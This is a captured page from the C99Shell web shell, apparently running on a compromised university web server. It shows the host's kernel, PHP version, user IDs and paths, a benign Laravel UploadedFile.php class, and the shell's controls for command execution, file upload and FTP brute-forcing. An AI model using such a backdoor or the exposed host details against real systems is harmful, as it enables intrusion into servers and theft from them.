!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache/2.2.22 (Debian). PHP/5.6.36 

uname -a: Linux h05.hvosting.ua 4.9.110-amd64 #3 SMP Sun Nov 4 16:27:09 UTC 2018 x86_64 

uid=1389(h33678) gid=1099(h33678) groups=1099(h33678),502(mgrsecure) 

Safe-mode: OFF (not secure)

/home/h33678/data/www/it-man.ztu.edu.ua/src/vendor/laravel/framework/src/Illuminate/Http/   drwxr-xr-x
Free 116.5 GB of 200.55 GB (58.09%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     UploadedFile.php (1.64 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Illuminate\Http;

use 
Illuminate\Support\Traits\Macroable;
use 
Symfony\Component\HttpFoundation\File\UploadedFile as SymfonyUploadedFile;

class 
UploadedFile extends SymfonyUploadedFile
{
    use 
Macroable;

    
/**
     * Get the fully qualified path to the file.
     *
     * @return string
     */
    
public function path()
    {
        return 
$this->getRealPath();
    }

    
/**
     * Get the file's extension.
     *
     * @return string
     */
    
public function extension()
    {
        return 
$this->guessExtension();
    }

    
/**
     * Get the file's extension supplied by the client.
     *
     * @return string
     */
    
public function clientExtension()
    {
        return 
$this->guessClientExtension();
    }

    
/**
     * Get a filename for the file that is the MD5 hash of the contents.
     *
     * @param  string  $path
     * @return string
     */
    
public function hashName($path null)
    {
        if (
$path) {
            
$path rtrim($path'/').'/';
        }

        return 
$path.md5_file($this->path()).'.'.$this->extension();
    }

    
/**
     * Create a new file instance from a base instance.
     *
     * @param  \Symfony\Component\HttpFoundation\File\UploadedFile  $file
     * @param  bool $test
     * @return static
     */
    
public static function createFromBase(SymfonyUploadedFile $file$test false)
    {
        return 
$file instanceof static ? $file : new static(
            
$file->getPathname(),
            
$file->getClientOriginalName(),
            
$file->getClientMimeType(),
            
$file->getClientSize(),
            
$file->getError(),
            
$test
        
);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by PinoyWH1Z | C99Shell Github | Generation time: 0.0188 ]--